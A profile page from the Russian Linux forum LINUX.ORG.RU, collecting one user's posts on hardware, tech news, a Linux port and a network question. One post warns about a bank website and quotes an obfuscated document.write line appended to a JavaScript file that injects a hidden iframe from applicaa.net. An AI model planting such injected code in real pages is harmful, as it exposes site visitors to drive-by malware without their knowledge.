LINUX.ORG.RU

Сообщения scott_tiger

 

Продам Efika MX в Москве - 6т.р.

Форум — Talks

О девайсе: http://www.genesi-usa.com/products/efika

Е-почта garuda@newmail.ru
Джаббер zhuzhka@jabber.ru

scott_tiger
()

Conky - отображение баланса в Megafon/Skylink

Форум — Desktop

Скрипты для получения баланса в Мегафоне как-то постил на ЛОР.
Недавно сделал аналогичный для Skylink-a. Кому интересно - добро пожаловать.

http://garuda.homeunix.net/cgi-bin/wiki/Conky

scott_tiger
()

www.promo.ru - трояны из коробки?

Форум — Talks

Предысторию изложу покороче, суть такова. На прошлой неделе знакомый стукнулся в аську и сказал что при пождении на по сайту одного из банков (пусть будет просто банк) вдруг выскочило сообщение с предложением проиграть mp3 файл. Еще один привлеченный знакомый сказал что у него стартовала джава и заорал касперский, а хромиум в режиме разработчика показывает наличие скриптов с сайта geliksss.net У меня винды нет совсем, попробовал мозиллой, да, NoScript говорит что заблокирован сайт geliksss.net

В этом банке у меня работают знакомые админы, хотя за сайт непосредственно и не отвечают. Сообщил им, они говорят служба безопасности посмотрела - всё ок.

На следующий день (в пятницу) сайт лег совсем, в пятницу же вечером его восстановили, я снова зашел мозиллой, geliksss.net пропал, появились ссылки на applicaa.net. Скачал wget-ом страницы и скрипты, в одном из файлов с джаваскриптами нашел такую строку, дописанную в конец файла и не относящуюся ни к каким фнкциям.

document.write(«<»+«i»+«f»+«rame»+" sr"+«c='http://applicaa.net/forum2/13'»+" style='d"+«isplay:no»+«ne;'></»+«i»+«f»+«rame>»);

Снова отослал коллегам с приветом службе безопасности. Дальше было еще некоторое количество общения на эту тему, в результате выяснилось:
- эти ссылки в код запихнули сами разработчики сайта
- на вопрос службы безопасности «что это?» разработчики ответили, это механизм раскрутки сайта, нет причин для беспокойства
- при более пристальном поиске обнаружился пресловутый mp3 файл, ссылка на сайт и е-адрес иранской освободительной киберармии.

Разработчик сайта - http://promo.ru/ Не хочу сказать что они злодеи и негодяи, но среди их сотрудников такие, видимо, имеются. Так что кому актуально - обратите внимание :)

scott_tiger
()

Fanbois love sex toys

Форум — Talks

Оригинал тут http://www.theregister.co.uk/2010/07/07/toy_revelation/

Крупный английский онлайн магазин товаров для секса LoveHoney опубликовал статистику Google Analytics, демонстрирующую, что пользователи iPad, в среднем, тратят на секс-игрушки больше всех (вдвое больше, чем пользователи Windows), за ними следуют пользователи iPhone-ов и пользователи Mac-ов.

Директор LoveHoney считает это свидетельством того, что пользователи продукции Apple более оригинальны и уверены в себе.

TheRegister предполагает что это скорее означает что большинство фанбоев Apple просто никогда не видели представителя противоположного пола в голом виде и предпочитают трать деньги на гаджеты типа TENGA Black Flip Hole Masturbator, после покупки которого им не приходится краснеть, спрашивая Стива Джобса, как правильно держать их устроство, чтобы получить максимальное удовлетворение.

Непростительным упущением является замалчивание статистики о пользователях Linux.

scott_tiger
()

Microsoft стал единственным поставщиком ПО, вошедшим в комитет по стандартизации ПО в России.

Новости — Linux в России
Группа Linux в России

Руководитель Ростехрегулирования (федеральное агентство, входящее в структуру Минпромторга) Григорий Элькин 13 мая подписал приказ 1728, в котором перечислены организации, вошедшие в технический комитет по стандартизации информационных технологий (ТК22).

Среди членов списка российские научные институты (Институт проблем информатики, Институт системного программирования и др.) и коммерческие компании (Казанская ICL-КПО-ВС, 51% которой принадлежит Fujitsu Technology Solutions, «КомпьюТел», «ИТ-Эксперт» и др.). Единственным попавшим в список поставщиком ПО стал «Майкрософт Рус».

>>> Подробности

 , ростехрегулирование,

scott_tiger
()

starfish v2

Галерея — Скриншоты

Была такая программа - генератор изображений starfish. Пользовался ей в ~2000г. Недавно вот вспомнил, нашел - до сих пор проект живёт, появилась вторая версия генератора. Под Unix была только v.1, да и той уже не найти, старничка автора на redplanet.com недоступна.

Списался с мантейнером Starfish под Windows, получил от него исходники, пару ц.у. и вот пытаюсь сделать версию для Linux на втором движке. На настоящий момент можно создавать png файлы с выбранной палитрой, осталось дописать установку фона рабочего стола и подчистить код.

Для винды есть код использующий SSE, он компилится, но работает некорректно. Если кто-то может помочь - будет здорово.

>>> Просмотр (1680x1050, 752 Kb)

scott_tiger
()

Шеф Google: «Только злодеи беспокоятся о приватности в сети»

Новости — Open Source
Группа Open Source

Если вы обеспокоены тем что Google собирает личные данные о вас, значит вы занимаетесь чем-то, чего делать не стоит. По крайней мере так считает исполнительный директор Google Эрик Шмидт.

«Если вы хотите скрыть что-то ото всех, может быть лучше просто не заниматься подобными вещами» заявил Шмидт в интервью Consumer News and Business Channel.

Больший интерес вызывает то, что Шмидт признал что в некоторых случаях поисковый гигант вынужден раскрывать информацию о личных данных.

Данная информация может быть причиной повестки в суд. Или целью хакерской атаки. Но если вас это беспокоит, вам должно быть стыдно за себя. По мнению Эрика Шмидта.

Gawker отмечает, что мышление Шмидта изменилось революционно. В 2006 году гугл ввел годовой мораторий на интервью с журналистами CNET, за публикацию информации о нем, найденную с помощью Google, в т.ч. о зарплате, хобби, бывших подружках и внебрачных связях.

>>> Подробности

 

scott_tiger
()

MSI 785GM + Phenom II и HD Video

Форум — General

Доброго всем здоровья,

MSI 785GM + Phenom II со встроеным радеоном потянет HD Video?

scott_tiger
()

Нетбук на платформе ARM от Asus поступит в продажу в первом квартале 2010

Новости — Hardware and Drivers
Группа Hardware and Drivers

На прошлой неделе исполнительный директор Asus Джерри Шен (Jerry Shen) пообещал, что компания начнет продажи нетбуков на платформе ARM в первом квартале следующего года.

Подробностей пока нет; возможно, они станут известны на этой неделе во время ежегодного праздника Научно-исследовательских и опытно-конструкторских работ Asus (Asus' annual R&D shindig), который ежегодно проходит в Тайпее. Но, по сообщению на китайском сайте ChinaTimes, цена может быть в пределах TWD6000 (£112/$185/€125).

Д.Шен заявил, что успех нетбуков на платформе ARM может затмить успех продуктов серии Eee PC. Похоже, он изменил свое мнение, поскольку в августе по поводу ARM-нетбуков он говорил, что не видит для них рынка, несмотря на то, что в июне Asus представила ARM-нетбук на Computex.

Продемонстрированная модель, Eee PC 1008HA, работала под Android. С какой ОС будут поставляться нетбуки в первом квартале 2010 неизвестно, Д.Шен об этом не упоминал.

>>> Подробности

 , , , ,

scott_tiger
()

Apple прекращает поддержку ZFS

Новости — Apple
Группа Apple

В пятницу на http://zfs.macosforge.org/ появилось сообщение "Проект ZFS прекращен. репозиторий и список рассылки будут скоро удалены"

В июне 2007 исполнительный директор Sun Джонатан Шварц заявил что Apple приняла решение сделать ZFS основной ФС в MacOS X. Apple опровергла это заявление, объявив, что ZFS будет доступна в виде дополнительной ФС. Ранее в этом году ZFS не была включена в новую версию MacOS X Snow Leopard.

На решение Apple могли повлиять неясные перспективы и статус продукта: NetApp подала в суд обвиняя Sun в нарушении патентов, Sun ответила встречным иском, Oracle купила Sun.

В настоящее время Apple ищет разработчика ФС: http://jobs.apple.com/index.ajs?metho...

>>> Подробности

 ,

scott_tiger
()

Sun сократит 3000 сотрудников

Новости — Проприетарное ПО
Группа Проприетарное ПО

Sun собирается сократить 3тыс. сотрудников в целях снижения расходов. Это вторая волна увольнений с прошлого ноября, когда было уволено 6тыс. сотрудников.

Сделка с Oracle, которая могла бы улучшить финансовое положение компании задерживается из-за расследования Европейского антимонопольной комиссии. Решение (по сообщению CNN) ожидается 19 ноября.

Представитель Sun отказался комментировать новость.

Курсы акций компаний Sun и Oracle упали после выхода новости.
http://money.cnn.com/quote/quote.html...
http://money.cnn.com/quote/quote.html...

>>> Подробности

 ,

scott_tiger
()

SCO дает пинка бывшему боссу МакБрайду.

Новости — SCO
Группа SCO

SCO Group, компания заявляющая о своих правах на код UNIX избавилась от своего склонного к спорам капитана Дарла МакБрайда, в соответствии с последним планом компании по спасению от банкротства.

Решение об отставке склонного к сутяжничеству руководителя было озвучено во время обмена документами с государственными управляющими, хотя в бумагах указана дата увольнения 14 октября. Решение уволить МакБрайда было принято с одобрения назначенного департаментом юстиции США распорядителя. Оставшиеся руководители компании могу побороться за корону.

Также было указано, что компания планирует закончить реструктуризацию и выйти на безубыточный уровень в следующем месяце, ведение дел по искам против IBM и Novell будет продолжено.

PS: дежавю? http://www.linux.org.ru/view-message....

>>> Подробности

 

scott_tiger
()

Washington Post рекомендует использовать Linux при совершении банковских on-line операций

Новости — Linux General
Группа Linux General

Корреспондент газеты Washington Post Брайан Керб, занимающийся вопросам информационнойбезопасности пишет, что в рамках проведенного им исследования взял интервью у представителей нескольких десятков компаний, потерявших от 100 до 500 тыс. долларов из-за того что компьютер с которого проводились банковские операции был инфицирован вредоносным ПО.

"Но вне зависимости от метода, использованного при мошенничестве, у всех атак был один общий знаменатель: они удались, потому что злоумышленники с помощью вредоносного ПО смогли получить полный контроль над компьютером жертвы с установленной ОС Windows."

Газета цитирует руководителя одной из пострадавших организаций, потерявшей около 200 тыс. долларов в результате заражения вредоносным ПО компьютера, с которого совершались банковские операции:

"Я настоятельно рекомендую обратить внимание на систему, которую вы используете для работы с банком. И если это Windows, пожалуй стоит поискать что-то другое".

Конечно, подойдут компьютеры Apple, но речь в основном идет о пользователях Windows, которым необходимо защититься от вредоносного ПО.

В качестве альтернативы предлагается использовать Linux LiveCD и дается ссылка на обучающую статью, в которой рассматривается Ubuntu.

>>> Подробности

 

scott_tiger
()

Nokia официально объявила о портировании Qt на Maemo 5.

Новости — KDE
Группа KDE

9 октября Nokia объявила о создании официальной версии Qt для Maemo 5 и опубликовала Technology Preview release. Версия Qt для Maemo 5 создана специально для работы в среде ОС Maemo 5, которая будет устанавливаться в N900, планшете-который-на-самом-деле-является -смартфоном. Версия Qt для Maemo основана на готовящейся Qt 4.6, релиз ожидается в первом квартале 2010.

Maemo 5 в N900 будет использовать GTK+ в качестве основного тулкита, но в следующих версиях планируется использовать Qt, поскольку приложения основанные на Qt легко переносимы между ОС - Windows, Linux, MacOS и Windows Mobile. Nokia так-же заявила что ведется разработка Qt для Symbian.

Порт Qt на Maemo от Nokia включает в себя проект "Qt for maemo" разрабатываемый сообществом, который стал мощной основой для создания официальной версии. Создание официальной версии потребовалось для того чтобы обеспечить совместимость с будущими версиями Maemo, Symbian и другими платформами на которых работает Qt.

>>> Подробности

 , ,

scott_tiger
()

Критическая уязвимость в Adobe Reader. Патч ожидается во вторник.

Новости — Безопасность
Группа Безопасность

Обнаружена уязвимость в Reader и Acrobat 9.1.3 для Windows, Mac и Unix. По словам производителя, ошибка позволяет атакующему получить полный контроль над компьютером, или, в случае неудачи, привести к отказу в обслуживании. Эксплойты уже существуют. Adobe обещает выпустить обновление, исправляющее эту ошибку, во вторник.

Ошибка проявляется при открытии документа pdf, сформированного специальным образом.

Пользователи Windows Vista могут избежать проблем, используя механизм, известный как data execution prevention. Пользователи других платформ могут защититься, запретив исполнение javascript, но Adobe предупреждает, что возможно написание эксплойта, обходящего эту защиту.

Указывается, что это по меньшей мере третья серьезная уязвимость в этом году в продуктах Adobe (Reader & Flash), которые установлены на большинстве Windows-компьютеров. Компания Adobe известна не только тем, что выпускает продукты с ошибками, но и тем, что очень долго не выпускает заплатки к обнаруженным ошибкам.

>>> Источник

 , , , , ,

scott_tiger
()

Debian объявляет об официальной поддержке kFreeBSD

Новости — Debian
Группа Debian

Команда Debian, отвечающая за релизы, объявила о том, что порт Debian с ядром FreeBSD отныне рассматривается наравне с другими портами. Планируется, что будущий релиз с кодовым названием Squeeze будет первым дистрибутивом Debian, который выйдет с ядрами Linux и FreeBSD.

Основные причины включения ядра FreeBSD в официальные релизы - это возможность предложить пользователям больший выбор ядер, а также использовать полностью поддерживаемое ядро, которое обеспечивает такие возможности как jail, пакетный фильтр OpenBSD и поддержку драйверов NDIS в основной ветке разработки.

>>> Подробности

 , ,

scott_tiger
()

флеймообразующая статья :)

Форум — Talks
scott_tiger
()

Мигель Де Иказа ответил Ричарду Столлману.

Новости — Open Source
Группа Open Source

В частности он пишет:

"Создание CodePlex foundation было результатом усилий людей сотрудников Microsoft, которые верят в открытое ПО. Они прикладывают усилия чтобы изменить компанию изнутри. Работа в CodePlex - замечательный способ помочь направить Microsoft в правильную сторону.

и приводит такое сравнение:
...
Бенджамин Зандер пишет в своей книге "Искусство возможности": в 1900 году в Африку отправили двух продавцов обуви для разведки рынка. Один из них телеграфировал: "Ситуация безнадежна. тчк. Никто не носит обуви." Второй ответил: "Возможности для развития бизнеса. тчк. У них нет обуви."
...
По мнению Ричарда мир безнадежен. Я, с другой стороны, вижу возможность и перспективу.
...

>>> Подробности

 ,

scott_tiger
()

Новая (открытая?) ОС от Microsoft Research - Barrelfish

Новости — Open Source
Группа Open Source

Microsoft Reasearch совместно с университетом ETH Zurich выпустили первый релиз ОС, спроектированной для использования на многопроцессорных системах.

Согласно http://www.networkworld.com/community... ходят слухи, что ОС будет совершенно открыта и свободна, т.к. использует значительную часть кода с BSD лицензией.

Исходный код доступен для загрузки: http://www.barrelfish.org/release_200...

>>> Подробности

 , ,

scott_tiger
()

Что за шняга - левый localhost

Форум — Admin

Посмотрел в логи почтового сервер, заметил такую фигню # host 222.252.221.254 254.221.252.222.in-addr.arpa domain name pointer localhost. # host 123.27.1.1 1.1.27.123.in-addr.arpa domain name pointer localhost.

#tracepath 222.254.130.69

1: broadband-77-37-157-174.nationalcablenetworks.ru (77.37.157.174) 0.269ms pmtu 1500 1: no reply 2: mtk-1.msk.ip.ncnet.ru (77.37.254.85) 21.858ms 3: bgw-1-po2-0.msk.ip.ncnet.ru (77.37.254.45) 17.260ms 4: mow-b2-link.telia.net (80.239.193.153) 8.885ms 5: mow-b1-link.telia.net (80.91.254.69) 15.307ms 6: s-bb1-link.telia.net (80.91.251.221) 43.056ms asymm 7 7: kbn-bb1-link.telia.net (80.91.248.45) 34.200ms asymm 8 8: nyk-bb1-link.telia.net (80.91.254.89) 132.397ms asymm 9 9: sjo-bb1-link.telia.net (80.91.252.153) 206.578ms asymm 10 10: hnk-b1-link.telia.net (80.91.249.118) 345.513ms asymm 11 11: vptc-ic-130050-hnk-b1.c.telia.net (213.248.93.118) 348.612ms 12: localhost (123.30.79.1) 420.506ms 13: localhost (123.30.120.13) 395.363ms asymm 17 14: 203.162.231.6 (203.162.231.6) 399.492ms asymm 16 1: broadband-77-37-156-2.nationalcablenetworks.ru (77.37.156.2) 10760.038ms 15: 222.255.165.42 (222.255.165.42) 405.621ms asymm 14 1: broadband-77-37-156-2.nationalcablenetworks.ru (77.37.156.2) 10691.475ms 1: broadband-77-37-156-2.nationalcablenetworks.ru (77.37.156.2) 10065.492ms 16: localhost (222.252.221.254) 435.493ms 1: broadband-77-37-156-2.nationalcablenetworks.ru (77.37.156.2) 9580.072ms 18: localhost (222.254.112.1) 426.723ms pmtu 1492 18: no reply 19: no reply 20: no reply

Что за левые localhost-ы?

scott_tiger
()

RSS подписка на новые темы